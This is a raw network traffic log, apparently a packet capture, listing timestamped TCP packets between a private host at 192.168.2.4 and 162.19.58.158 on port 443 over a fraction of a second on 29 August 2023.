                                                                                                                  Aug 29, 2023 19:16:42.011229992 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.013386011 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013484955 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013485909 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.013508081 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013544083 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.013601065 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013654947 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.013665915 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013686895 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013710022 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.013719082 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.013746977 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.014400959 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.014477968 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.014492035 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.014535904 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.015696049 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.015803099 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.041734934 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.041831970 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.041903019 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.041975021 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042030096 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042046070 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042071104 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042071104 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042140007 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042196989 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042205095 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042224884 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042288065 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042309999 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042340994 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042368889 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042380095 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042434931 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042453051 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042469025 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042505026 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042519093 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042567968 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042599916 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042610884 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042632103 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042673111 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042697906 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042736053 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042747021 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042779922 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042804956 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042861938 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042874098 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.042885065 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042953014 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.042994976 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043004990 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043024063 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043081045 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043092966 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043114901 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043133974 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043175936 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043217897 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043229103 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043248892 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043289900 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043323040 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043354988 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043365002 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043384075 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043425083 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043477058 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043488026 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043498039 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043557882 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043562889 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043637991 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043698072 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043705940 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043737888 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043808937 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043808937 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043829918 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043884993 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.043891907 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.043953896 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044011116 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044013977 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044032097 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044099092 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044111967 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044123888 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044162035 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044183016 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044193983 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044224977 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044249058 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044291973 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044317961 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044327021 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044358015 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044394016 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044403076 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044425964 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044465065 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044473886 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044491053 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044548035 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044557095 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044574022 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044611931 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044646025 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044681072 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044688940 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044713974 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044747114 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044775009 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044815063 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044823885 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044842005 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044881105 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044905901 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044950008 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.044960022 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.044975996 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.045007944 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.045068979 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.045075893 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.045136929 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.045396090 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.047533989 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047626972 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047662020 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.047678947 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047708035 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047743082 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.047751904 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047794104 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.047794104 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047846079 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.047852993 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047884941 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047900915 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.047908068 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047946930 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.047946930 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.048006058 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.048013926 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.048032045 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.048070908 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.048078060 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.048147917 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.049552917 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.053711891 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.053793907 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.053845882 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.053869963 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.053900957 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.102210999 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.110620975 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110692024 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110735893 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110750914 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.110789061 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110811949 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110863924 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110917091 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110925913 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.110938072 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110959053 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.110995054 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111018896 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111026049 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111037970 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111057043 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111084938 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111084938 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111099005 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111126900 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111155987 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111196041 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111196995 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111206055 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111243010 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111248016 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111258984 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111300945 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111324072 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111332893 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111346006 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111366034 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111385107 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111401081 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111408949 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111429930 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111434937 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111485004 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111505985 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111515045 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111537933 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111547947 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111581087 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111586094 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111597061 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111638069 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111644983 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111654997 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111687899 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111701012 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111745119 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111746073 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111753941 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111802101 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111826897 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111836910 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111850023 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111855984 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111887932 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111917019 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111924887 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111937046 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111963987 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.111979961 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.111994982 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.112003088 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112027884 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112030983 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.112078905 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112081051 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.112088919 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112124920 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112128019 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.112135887 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112164974 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.112179041 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112190008 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.112196922 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.112226009 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113401890 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113461971 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113488913 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113507986 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113553047 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113568068 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113578081 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113595963 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113603115 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113627911 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113634109 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113657951 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113682032 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113688946 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113698959 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113722086 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113743067 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113748074 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113755941 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113790035 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113790035 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113801956 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113831043 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113842964 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113882065 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113887072 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113895893 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113929987 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113935947 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113945007 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.113981009 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.113990068 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114033937 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114062071 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114068985 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114080906 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114094019 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114118099 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114120007 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114126921 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114167929 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114185095 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114192963 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114213943 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114223957 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114253044 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114259958 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114288092 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114303112 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114310980 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114336967 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114341974 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114396095 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114402056 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114412069 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114448071 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114456892 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114495993 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114500046 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114509106 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114546061 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114552975 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114562035 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114598989 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.114602089 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114610910 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.114655018 CEST44349712162.19.58.158192.168.2.4
